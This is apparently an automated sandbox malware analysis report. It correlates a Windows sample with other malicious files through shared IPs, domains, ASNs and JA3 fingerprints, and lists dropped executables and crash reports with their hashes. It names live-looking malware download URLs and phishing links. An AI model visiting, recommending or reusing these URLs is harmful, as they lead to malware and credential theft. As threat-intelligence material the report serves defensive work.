VT rate limit hit for: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Simulations

Behavior and APIs

Time	Type	Description
11:33:36	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.132.113	4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exe	Get hash	malicious	Babadeda, Bdaejec	Browse
	4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exe	Get hash	malicious	Babadeda, Bdaejec	Browse
	4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exe	Get hash	malicious	Bdaejec, Socelars	Browse
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse
	SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRAT	Browse
	SecuriteInfo.com.Win64.DropperX-gen.20168.7257.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar, zgRAT	Browse
	UmMgwOUPt5.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse
	SecuriteInfo.com.Win64.DropperX-gen.29167.15583.exe	Get hash	malicious	PureLog Stealer	Browse
13.248.148.254	eqqjbbjMlt.elf	Get hash	malicious	Unknown	Browse	ww38.fmoovies.to/
	http://www.multipool.us	Get hash	malicious	Unknown	Browse	ww12.multipool.us/track.php?domain=multipool.us&caf=1&toggle=answercheck&answer=yes&uid=MTcyMDYyMjM5MS4yMjM1OjVjOTE5YWZmN2E1ZDQyNWY5MDE0Nzg0YzIwZGI1NzNiMGZkYzI3MWFiMWE0MGU0NzBjYjkyZjk4MmNlNjdjZDI6NjY4ZTlkMzczNjkwYg%3D%3D
	http://pollyfill.io	Get hash	malicious	Unknown	Browse	ww38.pollyfill.io/favicon.ico
	http://simxtrackredirecttszz.pages.dev/	Get hash	malicious	Unknown	Browse	ww12.ngelit.com/favicon.ico
	file.exe	Get hash	malicious	CMSBrute	Browse	ww12.runfoxyrun.com/administrator/index.php?usid=18&utid=25958170171
	http://dohigu.com	Get hash	malicious	Unknown	Browse	ww12.dohigu.com/favicon.ico
	http://cs.ffbtas.com	Get hash	malicious	Unknown	Browse	ww9.ffbtas.com/favicon.ico
	http://browser-intake-foxbusiness.com	Get hash	malicious	Unknown	Browse	ww12.browser-intake-foxbusiness.com/track.php?domain=browser-intake-foxbusiness.com&caf=1&toggle=answercheck&answer=yes&uid=MTcxMzg5NTI1Mi44NjE1OmM2OTk2NjQ2NzQ1ODFkZjQ1ZGY1Yzk2MTk5MTNlY2I4NjgwMTEwZmU5ZDNmNWY5MDkzMmE3YWRiNjI0MDgwOWY6NjYyN2Y3NTRkMjUyNg%3D%3D
	jqXe6tttFa.exe	Get hash	malicious	Povlsomware, RansomeToad	Browse	ww12.primearea.biz/favicon.ico
	http://zacharryblogs.com	Get hash	malicious	Unknown	Browse	ww12.zacharryblogs.com/favicon.ico
44.221.84.105	63D7B37217BAD05463192BD2F5E39A4AC23FF21C52CD27BF541780D29CF77C7F.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	641ce2409374cfc1d1e5ffcb68c0f53239453da0a60bc6021a228d5c0eed5204.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	62e622661a968df60428fb599c2008c35b47079cf1d9cd8be611f671a9b21f4c.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	weH771UOWv.exe	Get hash	malicious	Sality	Browse	arthur.niria.biz/xs.jpg?601b2a60=-2140362368
	56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exe	Get hash	malicious	Bdaejec, RedLine	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	55282E8B63997F62AF3DD4B9D40CACB30A72D8DB1597D3F53057839CF7335750.exe	Get hash	malicious	Bdaejec, RedLine	Browse	ddos.dnsnb8.net:799/cj//k5.rar

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
765534.parkingcrew.net	mp3studios_6.exe	Get hash	malicious	Socelars	Browse	76.223.26.96
	mp3studios_92.exe	Get hash	malicious	Socelars	Browse	76.223.26.96
	microsoft office 2007 service pack 2.exe	Get hash	malicious	Unknown	Browse	13.248.148.254
ww99.icodeps.com	4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exe	Get hash	malicious	Bdaejec, Socelars	Browse	67.225.218.41
iplogger.org	4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exe	Get hash	malicious	Babadeda, Bdaejec	Browse	104.21.4.208
	4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exe	Get hash	malicious	Babadeda, Bdaejec	Browse	172.67.132.113
	4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exe	Get hash	malicious	Bdaejec, Socelars	Browse	172.67.132.113
	file.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	104.21.4.208
	setup.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, RedLine, Stealc, Stealerium, Vidar	Browse	104.21.4.208
	1720605557.036432_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, Socks5Systemz, Stealc, Stealerium, Vidar	Browse	104.21.4.208
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	172.67.132.113
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	172.67.132.113
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	172.67.132.113
	SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe	Get hash	malicious	CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	104.21.4.208
www.icodeps.com	4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exe	Get hash	malicious	Bdaejec, Socelars	Browse	172.232.4.213
	7zS.sfx.exe	Get hash	malicious	CryptOne, Fabookie, Nymaim, SmokeLoader, Socelars, lgoogLoader, onlyLogger	Browse	127.0.0.1
	mp3studios_6.exe	Get hash	malicious	Socelars	Browse	67.225.218.6
	mp3studios_92.exe	Get hash	malicious	Socelars	Browse	67.225.218.6
	0fx8tmMwZ9.exe	Get hash	malicious	Fabookie, ManusCrypt, Nymaim, Socelars	Browse	149.28.253.196
	HzmqhxP0xt.exe	Get hash	malicious	Socelars	Browse	149.28.253.196
	file.exe	Get hash	malicious	Socelars	Browse	149.28.253.196
	PkjZMkwOLt.exe	Get hash	malicious	Socelars	Browse	149.28.253.196
	file.exe	Get hash	malicious	Socelars	Browse	149.28.253.196
	cOJ3C29gsz.exe	Get hash	malicious	Socelars	Browse	149.28.253.196
ddos.dnsnb8.net	641ce2409374cfc1d1e5ffcb68c0f53239453da0a60bc6021a228d5c0eed5204.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	62e622661a968df60428fb599c2008c35b47079cf1d9cd8be611f671a9b21f4c.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	44.221.84.105
	5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	5673773206126F12F4692E91C084B927357D9CF5FA3D5C312D89C9942B5C90FE.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	55282E8B63997F62AF3DD4B9D40CACB30A72D8DB1597D3F53057839CF7335750.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exe	Get hash	malicious	Bdaejec, Socelars	Browse	172.232.4.213
	https://ridgecomm-my.sharepoint.com/:f:/g/personal/mike_dickson_ridgecommunicate_com/EoIXqm_rhmNPgUmdh9oGxVYBOC8z-wLp52vmISycophX2A?e=pxBR5z	Get hash	malicious	HTMLPhisher	Browse	2.16.238.149
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.9942.6374.rtf	Get hash	malicious	Remcos	Browse	172.233.177.4
	Fw PROPOSITION DE BELGOSUC.eml	Get hash	malicious	SharepointPhisher	Browse	2.16.238.152
	FAMIGLIE E BONUS NATALIT pdf lnk.lnk	Get hash	malicious	Coinhive, Xmrig	Browse	23.200.0.17
	Building Made Easy Proposal .pdf	Get hash	malicious	Unknown	Browse	23.67.131.235
	Nin6JE44ky.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	23.219.161.132
	S004232824113048.xls	Get hash	malicious	Remcos, DBatLoader	Browse	172.234.216.245
	https://forms.office.com/Pages/ResponsePage.aspx?id=1Q-W37eeFkOVQFk99a-XlFYn76Ck1HRGrw1irS-ELQ9URTlQNkZEQk9aR1UyU0ZYQzNDUjVRWk1YUi4u	Get hash	malicious	Unknown	Browse	104.83.5.113
	[SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml	Get hash	malicious	Unknown	Browse	2.16.241.13
AMAZON-AESUS	63D7B37217BAD05463192BD2F5E39A4AC23FF21C52CD27BF541780D29CF77C7F.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	https://sidbm.net/officialweb/?russell.sinco@corespecialty.com	Get hash	malicious	HTMLPhisher	Browse	34.193.43.67
	641ce2409374cfc1d1e5ffcb68c0f53239453da0a60bc6021a228d5c0eed5204.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	62e622661a968df60428fb599c2008c35b47079cf1d9cd8be611f671a9b21f4c.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	44.221.84.105
	5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105
	5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	https://rb.gy/ExNW8Q	Get hash	malicious	Unknown	Browse	18.205.211.225
	weH771UOWv.exe	Get hash	malicious	Sality	Browse	44.221.84.105
	56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
CLOUDFLARENETUS	https://sidbm.net/officialweb/?russell.sinco@corespecialty.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe	Get hash	malicious	Bdaejec, PrivateLoader	Browse	172.67.133.215
	https://forms.office.com/r/MbTXnrrxDY	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	188.114.96.3
	http://pub-18c0b230f8f2453bbc80499dbfd675b4.r2.dev	Get hash	malicious	Unknown	Browse	104.17.247.203
	Millich Law.pdf	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://mfgvendor.feeco.com:8081/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://mfgvendor.feeco.com:8081/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://rb.gy/ExNW8Q	Get hash	malicious	Unknown	Browse	188.114.96.3
	securedoc_20240724T165428.html	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.17.25.14
AMAZON-02US	https://sidbm.net/officialweb/?russell.sinco@corespecialty.com	Get hash	malicious	HTMLPhisher	Browse	18.239.36.8
	https://forms.office.com/r/MbTXnrrxDY	Get hash	malicious	HTMLPhisher	Browse	108.156.2.59
	https://rb.gy/ExNW8Q	Get hash	malicious	Unknown	Browse	18.238.243.41
	weH771UOWv.exe	Get hash	malicious	Sality	Browse	54.244.188.177
	https://tsgfusion.com	Get hash	malicious	Unknown	Browse	18.245.218.47
	securedoc_20240724T165428.html	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	108.156.39.24
	http://link.mail.beehiiv.com/ss/c/u001.6C5fb2jgNhK_7sih4vM3VdXQvrvE9q5c82BetVgY4Tn_3vzvYophOo2JT7xoV-WSpIvcZOkxKRXavgDLqT8WDs81Kxwhn4ndaTj0SIW8pbE34PI3c8z85y8KF4b-3ctNBArb85FAtL-FvZ40umZH9aQETjMP7rTEiG1euALUwnOXxEOVey2ATbLesbQR6xxXmVQHnmd4pAMEpmvli0DXS3xWhmye0azQAc3gRlzrGWVUMzqfQog2yJQHz6Mdmf6a4nCgejh2JKgdwU-dC7d7RpcWEcgULfqQmicxg_xKRYc1aJrR3j1E3jT9fZxZO7WhDsQCbeMl8Mpj69s5RbxkO_huRS08Z3pfl78-scr41jA/47y/YxEtkvUcQDyArHo9NWTE1A/h6/h001.EMfOFVR5jhkE5RSbP1E9Z3FDv6QlJukJxLDJqd6igsM#DB87@OFSOPTICS.COM	Get hash	malicious	HTMLPhisher	Browse	18.239.83.108
	https://www.dropbox.com/l/scl/AAAGZgqGD2VsOM3BmcwwRTtQakzHTKGjOQQ	Get hash	malicious	Unknown	Browse	18.239.36.78
	http://myuhnj.org	Get hash	malicious	Unknown	Browse	13.227.219.91
	KfxEYxBsJm.exe	Get hash	malicious	Python Stealer, Monster Stealer	Browse	65.0.21.192

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	63D7B37217BAD05463192BD2F5E39A4AC23FF21C52CD27BF541780D29CF77C7F.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	172.67.132.113 172.232.25.148
	XEV5ucEWu7.exe	Get hash	malicious	Unknown	Browse	172.67.132.113 172.232.25.148
	o7Da7jGSSj.exe	Get hash	malicious	Unknown	Browse	172.67.132.113 172.232.25.148
	qGJBgGtR7e.exe	Get hash	malicious	Gh0stCringe, GhostRat, Mimikatz, RunningRAT	Browse	172.67.132.113 172.232.25.148
	5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	172.67.132.113 172.232.25.148
	#U7b2c#U9646#U6279#U6b21#U8868#U683c.exe	Get hash	malicious	Unknown	Browse	172.67.132.113 172.232.25.148
	VaajyQsbTV.exe	Get hash	malicious	GhostRat, Nitol	Browse	172.67.132.113 172.232.25.148
	4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exe	Get hash	malicious	Bdaejec, Socelars	Browse	172.67.132.113 172.232.25.148
	af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exe	Get hash	malicious	Nanocore, Remcos	Browse	172.67.132.113 172.232.25.148
	44112B6D303C7DF1528B55525872FEF0F08DE8C2A467F8E4D3B820F634F1F2C2.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	172.67.132.113 172.232.25.148

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\MDSxhU.exe	63D7B37217BAD05463192BD2F5E39A4AC23FF21C52CD27BF541780D29CF77C7F.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse
	641ce2409374cfc1d1e5ffcb68c0f53239453da0a60bc6021a228d5c0eed5204.exe	Get hash	malicious	Bdaejec	Browse
	62e622661a968df60428fb599c2008c35b47079cf1d9cd8be611f671a9b21f4c.exe	Get hash	malicious	Bdaejec, Lokibot	Browse
	611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe	Get hash	malicious	Bdaejec, PrivateLoader	Browse
	5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse
	5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse
	58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse
	5673773206126F12F4692E91C084B927357D9CF5FA3D5C312D89C9942B5C90FE.exe	Get hash	malicious	Bdaejec, RedLine	Browse
	56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exe	Get hash	malicious	Bdaejec, RedLine	Browse
	54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590305775549518
Encrypted:	false
SSDEEP:	384:1FESAXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:14QGPL4vzZq2o9W7GsxBbPr
MD5:	73F5EE347E908BC0022C84BDBF34791F
SHA1:	6DFC6AFF58CD38C7F6C0A3FA4A6B291F26853F4A
SHA-256:	07463AF7FFD3139B34E17168E9CB45DF5A021C22CD18C954E48D7EE6449D9072
SHA-512:	2F090E22FA24CB48F7CFD80A8B7556BCD918DEDECB5DD8A5BB7CF8DCA8D4852C47982A8005C0D1689528D3DC1782F8BA16B2A9CAF56A79B2DDE7D5BC3194DF2C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2389504
Entropy (8bit):	6.731349296928716
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	F65D1CDDF2BE1E6AC7DD5EA91415D38B
SHA1:	6650DF54870A554239C75E46C90FD91166C17866
SHA-256:	23FC21AEEED396465F91D2ACE4FDE222BD0BDEAF486D5958F074F4363AECAB3F
SHA-512:	E9F066CD3D05205AA1AD6A6BCD75000C1F7CAB80CDDC84F383E209F326778EFF634E36D3299563861946F9F9BB2E8CA26C6596C3F01E5D903DDA202BA915EDB9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366817401791629
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdM5QGPL4vzZq2o9W7GsxBbPr:uHqaNrFdMuGCq2iW7z
MD5:	EAE4AEAAC4BC3B33B593B3458990C839
SHA1:	94A248F61A577D6C6B4090FB13584B755F0E7E8C
SHA-256:	6D092B5C13B54A6473D47FC2CA46E7FDAB4D8E6EE272EFB56697D36D0ADAF806
SHA-512:	A6E6DE266F292555A96023FFB558065CD95C5841EB6EAF6AF577AED690923F90F1025985D9E07055CE2B043E6CC10CFC0029CDCAE42A5EEE532CB0349FA3E41D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_65BD7E49FE292748_6935c6e021376dbac95272cab09eccee5e14d8_a21a7237_d2d51ba5-6717-4d2c-a9dd-516be4b8776b\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.091070179751811
Encrypted:	false
SSDEEP:	192:Rj8L/oYphw64f0BU/cmOjk9bZzuiFTZ24IO8VZG:C3pivMBU/ojUzuiFTY4IO8K
MD5:	D2CD737459E89410F6402DD20FA7FB00
SHA1:	42E516491CDA9D566A34E8D9CAEE869BD03A1233
SHA-256:	7FBB5E68E5C79D164E8404BC73E38BA1D81C8A108FB156381531E96A633BAD1C
SHA-512:	AA8F0101AA340F296E54A2F13F5FFD2830A254F598596CB4A63A98DD5B7268887722D479FE2728FCF02DCC41A414189CA1E4492362FCE13A06B06D1E44425FC7
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.0.8.7.8.7.3.7.9.9.2.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.0.8.7.9.5.3.7.9.9.1.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.d.5.1.b.a.5.-.6.7.1.7.-.4.d.2.c.-.a.9.d.d.-.5.1.6.b.e.4.b.8.7.7.6.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.b.a.d.c.b.c.-.a.5.1.d.-.4.5.0.8.-.b.c.0.b.-.6.a.4.1.5.6.5.5.f.1.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.5.B.D.7.E.4.9.F.E.2.9.2.7.4.8.F.0.C.5.0.4.D.C.B.E.F.D.B.0.A.D.8.6.E.6.9.C.8.3.4.9.D.7.2.5.3.D.0.E.9.5.E.B.F.1.B.F.0.1.1.0.B.0.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.8.c.-.0.0.0.1.-.0.0.1.4.-.e.4.7.e.-.b.3.c.1.d.e.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.a.c.6.1.1.1.0.7.a.7.0.9.2.6.c.9.b.f.1.d.4.0.3.b.b.7.0.7.d.b.6.0.0.0.0.0.9.0.4.!.0.0.0.0.b.a.d.7.9.f.b.2.e.7.9.f.1.2.f.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MDSxhU.exe_246b71885eb38529d556a0e49a5fde19bde1b8b_81bd24f3_bc6ed3d0-fb76-46de-a612-06b55e99f885\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9758237409892532
Encrypted:	false
SSDEEP:	192:oUCbrQi0BjYZb8djUfpXzuiFTZ24IO80j:arQpBjYZujqzuiFTY4IO8K
MD5:	7EA746301440C166C2E9261148763E83
SHA1:	D6D167C6DB0D345A897B29AF42E243C210BCE3DA
SHA-256:	11CCCA1052FA0BBFDF82C30DC09FFECE5BF252D433F74257857E2F3D08BE36EB
SHA-512:	C71D9F6F4AFDD92EF0E0BD9701C192E9A55340D7C8193B3BCBB48957D10A2A0FF1F6E38E6BFA5CC2E4B61DEE2076769289594CA12D1EDE3AC923038C778DA40F
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.0.8.8.0.0.6.1.9.4.2.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.0.8.8.0.1.0.1.0.0.4.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.6.e.d.3.d.0.-.f.b.7.6.-.4.6.d.e.-.a.6.1.2.-.0.6.b.5.5.e.9.9.f.8.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.b.f.1.7.5.c.-.9.0.7.d.-.4.5.1.7.-.a.8.a.4.-.a.d.5.5.5.9.c.8.7.9.e.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.D.S.x.h.U...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.3.c.-.0.0.0.1.-.0.0.1.4.-.c.c.b.0.-.d.4.c.1.d.e.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.4.4.2.c.9.6.9.7.d.6.6.3.e.8.1.7.e.8.2.7.6.d.0.3.6.d.4.7.1.9.1.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.M.D.S.x.h.U...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER48DB.tmp.dmp

